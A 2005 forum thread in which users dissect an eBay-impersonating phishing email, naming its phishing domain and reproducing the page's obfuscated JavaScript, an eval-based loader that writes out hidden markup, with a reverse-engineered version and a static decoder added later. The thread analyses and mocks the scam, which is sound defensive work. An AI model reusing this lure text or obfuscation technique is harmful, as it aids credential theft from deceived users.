HOLY BLEEP! Evil Spammer/Phisher!!!

Started by Darren Dirt, October 05, 2005, 02:53:21 PM


Darren Dirt

Oh, what evil... So here's the spam I just got:



- - -



Dear ebay member,





For the User Agreement, Section 9, we may immediately issue a warning, temporarily suspend, indefinitely suspend or terminate your membership and refuse to provide our services to you if we believe that your actions may cause financial loss or legal liability for you, our users or us. We may also take these actions if we are unable to verify or authenticate any information you provide to us.



We regret to inform you that your eBay account could be suspended if you don't re-update your account information. To resolve this problems please use the link below and re-enter your account information. If your problems could not be resolved your account will be suspended for a period of 48 hours, after this period your account will be terminated.





Due to the suspension of this account, please be advised you are prohibited from using eBay in any way. This includes the registering of a new account. Please note that this suspension does not relieve you of your agreed-upon obligation to pay any fees you may owe to eBay.



To update your record please click here:



[Respond Now]



Attention number: 4766133494

Security details: Notification of Unauthorized Account Access





- - -



So the link to allegedly "update my eBay account" is a button, I do a view-partial-source, it goes here:



http://chase-registr.com/eBayISAPI/index.htm



Click the link, nothing bad happens, but their bad web dev job reveals the villainy, even to non-techies :o Evil Bastages!  :evil:



Oh, and if you enter pretty much ANY garbage in the username/password, you get this priceless gem:



http://chase-registr.com/eBayISAPI/SecurityMeasures.php



- - -



Gee, do you think there's something a bit questionable happening in the Javascript?

<script language="JavaScript" type="text/javascript"><!--

var h="+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<-p hy4xBA9W?T6/18;eibLJ:IcajC\"7M",g="",x=63,c="";eval(unescape("%66%75%6E%63%74%69%6F%6E%20%69%28%79%29%7B%76%61%72%20%66%3D%27%27%2C%7A%2C%71%2C%77%2C%76%3B%66%6F%72%28%7A%3D%30%3B%7A%3C%79%2E%6C%65%6E%67%74%68%3B%7A%2B%2B%29%7B%71%3D%79%2E%63%68%61%72%41%74%28%7A%29%3B%77%3D%68%2E%69%6E%64%65%78%4F%66%28%71%29%3B%69%66%28%77%3E%2D%31%29%7B%76%3D%28%28%77%2B%31%29%25%78%2D%31%29%3B%69%66%28%76%3C%3D%30%29%7B%76%2B%3D%78%7D%66%2B%3D%68%2E%63%68%61%72%41%74%28%76%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%71%7D%7D%63%2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%6A%6A%6A%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%29%3B%67%3D%22%22%7D"));i("h-)agb Sh=jo&<j&iz7:j_jnagb S7hS4 iz7SiBS1Cj_j)agb S7t\r\n_jgh_<=omB,h_<=om4,h_<=om>,h_<=omye\r\nv<oaSbuoh_<=omaj=aE(h{\r\n_jghguuSzh0ua<2ioS[hE0ua<2ioS3au2 jS+u0izz'\"nn8\"u2 jS'(hTh'0ua<2ioSl=i2ioS'hIh'Lu04'h]e\r\n_<=omBzh>bo0u>3)agiioJivSr/;e\r\n_<=om4zh>bo0u>3)agiio6u p8We\r\n11_<=om>zhxHPe\r\n_<=om>zhguuS3uvv)iS?b0SypHHPe\r\n_<=omyzh8Me\r\n_<=om)yu>E(e\r\n}\r\n_jgh_<=om>boe\r\nv<oaSbuoh_<=om u E(\r\n{\r\n_<=om>bozh>bo0u>3agijSi%u < E(e\r\n_<=om>bo30ua<2ioS3Lu043booigd6+Jzh_<=omyS2=e\r\n_<=o");i("m>bo30ua<2ioS3Lu043)S4=i32jg&bozhPe\r\n_<=om>bo30ua<2ioS3Lu043uo<o=uj0zh_<=om u e\r\n_<=om)yu>E(e\r\n}\r\nv<oaSbuoh_<=om)yu>E(\r\n{\r\nbvhE_<=om>bo(h_<=om>bo3)yu>E_<=omB,h_<=om4,h_<=om>,h_<=omy(e\r\n}\r\n_jgh_<=omyS2=zh'\\Bf\"0b_h)S4=iz7yib&ySIh8PPseh=boipyib&ySIh8M BehvuoSpvj2b=4Ih\\'6jyu2j\\',h)jo)p)igbvehvuoSp)bwiIh; Se7tySS )I11)b&obo3iLj43au21>)1iAj4cn9%c30==Tnb&oco.)b0z_igbv4.aum jgSoigc0zH.)bSib0zP\\Bf\"10b_t'e\r\nbvhE>bo0u>3agijSi%u < (h{h_<=omaj=aE(eh_<=om u E(eh>bo0u>3)iScoSig_j=E_<=om");i("aj=a,h8(eh}\r\n-1)agb Sth");jjj();document.write(g);g="";//--></script>
_____________________

Strive for progress. Not perfection.
_____________________

Mr. Analog

Ha, man these phishers have no pride at all eh?



I'd totally try the "One of your credit card numbers might be lucky! Just send me your card numbers and at the end of each month, if you are lucky, you could win up to $100!" ;)
By Grabthar's Hammer

Darren Dirt

Shameless. Idiots, creative but poor coders, and shameless. :P





I took screenshots of page1 and page2 -- since I doubt that site will be live for much longer...



PS: really funny, open either page, and MINIMIZE, watch what happens to the "address bar" :rolleyes:








Darren Dirt

Just did some quick reverse engineering, i.e. alert() instead of document.write() or eval()...



"crack'd version" -- save as something.html and launch it to see what trickery was behind the Code...




<script language="JavaScript" type="text/javascript"><!--



var h="+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<-p hy4xBA9W?T6/18;eibLJ:IcajC\"7M",

g="",

x=63,

c="";



var SOME_STUPID_SECRET_CODE="%66%75%6E%63%74%69%6F%6E%20%69%28%79%29%7B%76%61%72%20%66%3D%27%27%2C%7A%2C%71%2C%77%2C%76%3B%66%6F%72%28%7A%3D%30%3B%7A%3C%79%2E%6C%65%6E%67%74%68%3B%7A%2B%2B%29%7B%71%3D%79%2E%63%68%61%72%41%74%28%7A%29%3B%77%3D%68%2E%69%6E%64%65%78%4F%66%28%71%29%3B%69%66%28%77%3E%2D%31%29%7B%76%3D%28%28%77%2B%31%29%25%78%2D%31%29%3B%69%66%28%76%3C%3D%30%29%7B%76%2B%3D%78%7D%66%2B%3D%68%2E%63%68%61%72%41%74%28%76%2D%31%29%7D%65%6C%73%65%7B%66%2B%3D%71%7D%7D%63%2B%3D%66%7D%3B%66%75%6E%63%74%69%6F%6E%20%6A%6A%6A%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%63%29%3B%67%3D%22%22%7D";



alert(unescape(SOME_STUPID_SECRET_CODE));



eval(unescape(SOME_STUPID_SECRET_CODE));



i("h-)agb Sh=jo&<j&iz7:j_jnagb S7hS4 iz7SiBS1Cj_j)agb S7t\r\n_jgh_<=omB,h_<=om4,h_<=om>,h_<=omye\r\nv<oaSbuoh_<=omaj=aE(h{\r\n_jghguuSzh0ua<2ioS[hE0ua<2ioS3au2 jS+u0izz'\"nn8\"u2 jS'(hTh'0ua<2ioSl=i2ioS'hIh'Lu04'h]e\r\n_<=omBzh>bo0u>3)agiioJivSr/;e\r\n_<=om4zh>bo0u>3)agiio6u p8We\r\n11_<=om>zhxHPe\r\n_<=om>zhguuS3uvv)iS?b0SypHHPe\r\n_<=omyzh8Me\r\n_<=om)yu>E(e\r\n}\r\n_jgh_<=om>boe\r\nv<oaSbuoh_<=om u E(\r\n{\r\n_<=om>bozh>bo0u>3agijSi%u < E(e\r\n_<=om>bo30ua<2ioS3Lu043booigd6+Jzh_<=omyS2=e\r\n_<=o");



i("m>bo30ua<2ioS3Lu043)S4=i32jg&bozhPe\r\n_<=om>bo30ua<2ioS3Lu043uo<o=uj0zh_<=om u e\r\n_<=om)yu>E(e\r\n}\r\nv<oaSbuoh_<=om)yu>E(\r\n{\r\nbvhE_<=om>bo(h_<=om>bo3)yu>E_<=omB,h_<=om4,h_<=om>,h_<=omy(e\r\n}\r\n_jgh_<=omyS2=zh'\\Bf\"0b_h)S4=iz7yib&ySIh8PPseh=boipyib&ySIh8M BehvuoSpvj2b=4Ih\\'6jyu2j\\',h)jo)p)igbvehvuoSp)bwiIh; Se7tySS )I11)b&obo3iLj43au21>)1iAj4cn9%c30==Tnb&oco.)b0z_igbv4.aum jgSoigc0zH.)bSib0zP\\Bf\"10b_t'e\r\nbvhE>bo0u>3agijSi%u < (h{h_<=omaj=aE(eh_<=om u E(eh>bo0u>3)iScoSig_j=E_<=om");



i("aj=a,h8(eh}\r\n-1)agb Sth");



//jjj();

alert(c);



//alert(g);



//g="";



//--></script>

_____________________

Strive for progress. Not perfection.
_____________________
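
The substitution uncovered in the post above can also be decoded statically, so that nothing from the phishing page is ever passed to eval(). This is an added example for Node.js, not code from the thread: the helper names (percentDecode, decodeChunk, unescapeLiteral, deobfuscate) are assumptions of the example, and the sample input is constructed from the opening characters of the quoted payload.

```javascript
// Added example (not code from the thread): decode the page's payload as data,
// never through eval(). Alphabet `h` and modulus `x` are copied from the quoted script.
const h = "+rg&.3fv_m2Hd0P%s)(El=zw>tSnou<-p hy4xBA9W?T6/18;eibLJ:IcajC\"7M";
const x = 63;

// Equivalent of unescape() for %XX sequences: shows the loader stub as text.
function percentDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Re-implementation of the stub's i(): characters found in `h` are replaced by
// their left neighbour (wrapping at index 0); anything else passes through.
function decodeChunk(y) {
  let out = "";
  for (const q of y) {
    const w = h.indexOf(q);
    if (w === -1) { out += q; continue; }
    let v = ((w + 1) % x) - 1;
    if (v <= 0) v += x;
    out += h.charAt(v - 1);
  }
  return out;
}

// Resolve backslash escapes in a string literal taken from source text.
function unescapeLiteral(lit) {
  const named = { r: "\r", n: "\n", t: "\t" };
  return lit.replace(/\\(.)/g, (_, ch) => named[ch] ?? ch);
}

// Find every i("...") call in the script text and decode the arguments in order,
// which is what the stub accumulates in `c` before document.write(c).
function deobfuscate(scriptSource) {
  const calls = scriptSource.matchAll(/\bi\("((?:[^"\\]|\\.)*)"\)/g);
  return [...calls].map((m) => decodeChunk(unescapeLiteral(m[1]))).join("");
}

// Constructed sample: built from the opening characters of the thread's first
// i() argument, split across two calls the way the original splits its payload.
const sample = String.raw`i("h-)agb Sh=jo&<j&iz7:j_jn");i("agb S7t\r\n");`;

console.log(percentDecode("%66%75%6E%63%74%69%6F%6E%20%69%28%79%29"));
console.log(JSON.stringify(deobfuscate(sample)));
```

Feeding the saved page source to deobfuscate() as a string yields the hidden markup for inspection without rendering it in a browser.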

Thorin

Prayin' for a 20!

gcc thorin.c -pedantic -o Thorin
compile successful

Darren Dirt

[cynical]more like "Crooklyn"[/cynical]

Thorin

Yeah.  And not surprisingly, registered only a few days ago.  Gee, I wonder if the contact information is false?